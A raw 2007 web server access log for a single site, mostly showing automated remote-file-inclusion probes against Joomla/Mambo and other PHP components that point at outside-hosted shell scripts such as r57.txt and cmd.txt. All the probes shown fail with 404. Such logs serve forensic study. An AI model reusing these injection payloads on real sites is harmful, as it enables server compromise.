200.246.54.139 - - [19/Aug/2007:22:13:46 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://giks.net/php/x/rst.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
72.55.143.7 - - [19/Aug/2007:22:15:30 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mateus_jp.t35.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.55.143.7 - - [19/Aug/2007:22:15:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://mateus_jp.t35.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
208.66.194.5 - - [19/Aug/2007:22:15:42 -0700] "GET /logs/access.log HTTP/1.1" 200 75990 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
74.6.24.226 - - [19/Aug/2007:22:18:40 -0700] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:22:21:13 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
61.152.158.46 - - [19/Aug/2007:22:21:13 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:22:21:48 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:22:21:48 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.28.105 - - [19/Aug/2007:22:25:17 -0700] "GET /cendoc/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:22:29:55 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:22:29:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:22:32:55 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [19/Aug/2007:22:32:55 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.85.142.186 - - [19/Aug/2007:22:39:32 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.142.186 - - [19/Aug/2007:22:39:32 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:22:39:43 -0700] "GET /logs/access.log HTTP/1.1" 200 78481 "-" "Googlebot-Image/1.0" "www.galf.org"
200.75.226.236 - - [19/Aug/2007:22:42:58 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.galf.org"
200.75.226.236 - - [19/Aug/2007:22:42:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.galf.org"
200.75.226.236 - - [19/Aug/2007:22:43:05 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.galf.org"
200.75.226.236 - - [19/Aug/2007:22:43:11 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:22:47:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:22:47:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
195.246.158.53 - - [19/Aug/2007:22:47:46 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.246.158.53 - - [19/Aug/2007:22:47:47 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.75.226.236 - - [19/Aug/2007:22:52:31 -0700] "GET / HTTP/1.1" 200 1048 "http://www.lesbianas.tv" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.galf.org"
200.75.226.236 - - [19/Aug/2007:22:52:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:23:05:10 -0700] "GET /logs/access.log HTTP/1.1" 200 80794 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:23:08:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:23:08:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.10.144.46 - - [19/Aug/2007:23:08:50 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.10.144.46 - - [19/Aug/2007:23:08:50 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.34.68.13 - - [19/Aug/2007:23:10:19 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.34.68.13 - - [19/Aug/2007:23:10:19 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tarcisiobr.kit.net/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.34.68.13 - - [19/Aug/2007:23:10:19 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.34.68.13 - - [19/Aug/2007:23:10:19 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tarcisiobr.kit.net/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
69.10.144.46 - - [19/Aug/2007:23:12:22 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
69.10.144.46 - - [19/Aug/2007:23:12:22 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.142.212.190 - - [19/Aug/2007:23:16:38 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.galf.org"
83.18.159.125 - - [19/Aug/2007:23:17:40 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [19/Aug/2007:23:17:40 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:23:19:11 -0700] "GET /logs/access.log HTTP/1.1" 200 83672 "-" "Googlebot-Image/1.0" "www.galf.org"
83.18.159.125 - - [19/Aug/2007:23:20:02 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [19/Aug/2007:23:20:02 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.246.54.139 - - [19/Aug/2007:23:25:32 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://giks.net/php/x/rst.txt?cmd=id HTTP/1.1" 404 275 "-" "-"
213.91.180.230 - - [19/Aug/2007:23:30:43 -0700] "GET /logs/access_070219.log HTTP/1.1" 200 307222 "http://www.google.bg/search?hl=bg&q=+site:www.galf.org+www.galf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
213.91.180.230 - - [19/Aug/2007:23:31:17 -0700] "GET /logs/access_070305.log HTTP/1.1" 200 4239318 "http://www.google.bg/search?hl=bg&q=+site:www.galf.org+www.galf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
213.91.180.230 - - [19/Aug/2007:23:31:28 -0700] "GET /logs/access.log HTTP/1.1" 200 84855 "http://www.google.bg/search?hl=bg&q=+site:www.galf.org+www.galf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
208.66.194.5 - - [19/Aug/2007:23:34:30 -0700] "GET /logs/access.log HTTP/1.1" 200 85076 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
81.241.238.103 - - [19/Aug/2007:23:38:22 -0700] "GET /logs/index.php?go=http://www.masferrer.edu.sv/none/galeria/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.241.238.103 - - [19/Aug/2007:23:38:22 -0700] "GET /index.php?go=http://www.masferrer.edu.sv/none/galeria/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
70.84.4.50 - - [19/Aug/2007:23:42:08 -0700] "GET /logs/index.php?go=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.4.50 - - [19/Aug/2007:23:42:08 -0700] "GET /index.php?go=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:23:44:18 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [19/Aug/2007:23:44:18 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.90.8.66 - - [19/Aug/2007:23:46:10 -0700] "GET /logs/index.php?go=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.90.8.66 - - [19/Aug/2007:23:46:11 -0700] "GET /index.php?go=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.103.209 - - [19/Aug/2007:23:48:52 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.103.209 - - [19/Aug/2007:23:48:53 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.66.194.5 - - [19/Aug/2007:23:50:22 -0700] "GET /logs/access.log HTTP/1.1" 200 87056 "-" "Googlebot-Image/1.0" "www.galf.org"
209.66.114.245 - - [19/Aug/2007:23:57:07 -0700] "GET /logs/access_070702.log HTTP/1.0" 200 327680 "-" "-" "www.galf.org"
81.168.228.204 - - [20/Aug/2007:00:00:02 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
81.168.228.204 - - [20/Aug/2007:00:00:02 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.66.194.5 - - [20/Aug/2007:00:04:03 -0700] "GET /logs/access.log HTTP/1.1" 200 87638 "-" "Googlebot-Image/1.0" "www.galf.org"
195.246.158.53 - - [20/Aug/2007:00:13:01 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
195.246.158.53 - - [20/Aug/2007:00:13:01 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
222.122.156.238 - - [20/Aug/2007:00:14:27 -0700] "GET /logs/index.php?go=http://www.freewebtown.com/shellku/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
222.122.156.238 - - [20/Aug/2007:00:14:28 -0700] "GET /index.php?go=http://www.freewebtown.com/shellku/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:00:15:57 -0700] "GET /logs/index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:00:15:58 -0700] "GET /index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:00:19:39 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:00:19:40 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.66.194.5 - - [20/Aug/2007:00:30:39 -0700] "GET /logs/access.log HTTP/1.1" 200 89286 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:00:34:25 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:00:34:26 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
70.84.4.50 - - [20/Aug/2007:00:35:10 -0700] "GET /logs/index.php?inc=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.4.50 - - [20/Aug/2007:00:35:10 -0700] "GET /index.php?inc=http://members.lycos.nl/pspmusicfeed/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.40.192.101 - - [20/Aug/2007:00:36:01 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.40.192.101 - - [20/Aug/2007:00:36:01 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.40.192.101 - - [20/Aug/2007:00:37:12 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.40.192.101 - - [20/Aug/2007:00:37:12 -0700] "GET /modules/My_eGallery/index.php?basepath=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:00:37:15 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [20/Aug/2007:00:37:15 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:00:37:45 -0700] "GET /logs/access_070806.log/index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.22.48.204 - - [20/Aug/2007:00:37:45 -0700] "GET /index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:00:37:45 -0700] "GET /logs/index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.27.9.82 - - [20/Aug/2007:00:38:11 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.27.9.82 - - [20/Aug/2007:00:38:11 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
209.40.192.101 - - [20/Aug/2007:00:39:01 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.40.192.101 - - [20/Aug/2007:00:39:01 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tools.netfast.org/alat/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.27.9.82 - - [20/Aug/2007:00:39:49 -0700] "GET /logs/access_070723.log//admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.27.9.82 - - [20/Aug/2007:00:39:49 -0700] "GET /logs/access_070716.log//admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
87.101.4.42 - - [20/Aug/2007:00:43:48 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://marketingpower.ifrance.com/.z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.101.4.42 - - [20/Aug/2007:00:43:48 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://marketingpower.ifrance.com/.z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.55.208.230 - - [20/Aug/2007:00:46:46 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.230 - - [20/Aug/2007:00:46:47 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:00:48:45 -0700] "GET /logs/access_070730.log/template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:00:48:46 -0700] "GET /template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:00:48:47 -0700] "GET /logs/template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:00:48:47 -0700] "GET /logs/access_070723.log/template.php?pagina=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.22.48.204 - - [20/Aug/2007:00:53:32 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.22.48.204 - - [20/Aug/2007:00:53:32 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.66.194.5 - - [20/Aug/2007:00:53:41 -0700] "GET /logs/access.log HTTP/1.1" 200 95428 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
212.241.214.69 - - [20/Aug/2007:00:54:52 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.27.46 - - [20/Aug/2007:00:56:03 -0700] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:00:56:11 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:00:56:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.65.104.52 - - [20/Aug/2007:00:56:50 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
69.65.104.52 - - [20/Aug/2007:00:56:50 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807"
85.214.18.27 - - [20/Aug/2007:00:57:49 -0700] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.18.27 - - [20/Aug/2007:00:57:49 -0700] "GET //oneadmin/newspublish/include.php?path[docroot]=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.168.228.204 - - [20/Aug/2007:00:58:01 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.168.228.204 - - [20/Aug/2007:00:58:02 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.27.9.82 - - [20/Aug/2007:01:00:46 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
216.27.9.82 - - [20/Aug/2007:01:00:46 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
222.122.156.238 - - [20/Aug/2007:01:03:30 -0700] "GET /logs/index.php?inc=http://www.freewebtown.com/shellku/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
222.122.156.238 - - [20/Aug/2007:01:03:30 -0700] "GET /index.php?inc=http://www.freewebtown.com/shellku/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
62.75.193.80 - - [20/Aug/2007:01:05:32 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.80 - - [20/Aug/2007:01:05:33 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.152.158.46 - - [20/Aug/2007:01:08:41 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
61.152.158.46 - - [20/Aug/2007:01:08:42 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.182.111.1 - - [20/Aug/2007:01:10:00 -0700] "GET /logs/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.hipowerracing.com.au/cache/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.182.111.1 - - [20/Aug/2007:01:10:01 -0700] "GET /libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.hipowerracing.com.au/cache/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.159.30.67 - - [20/Aug/2007:01:10:05 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://marketingsciences.es/Qe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
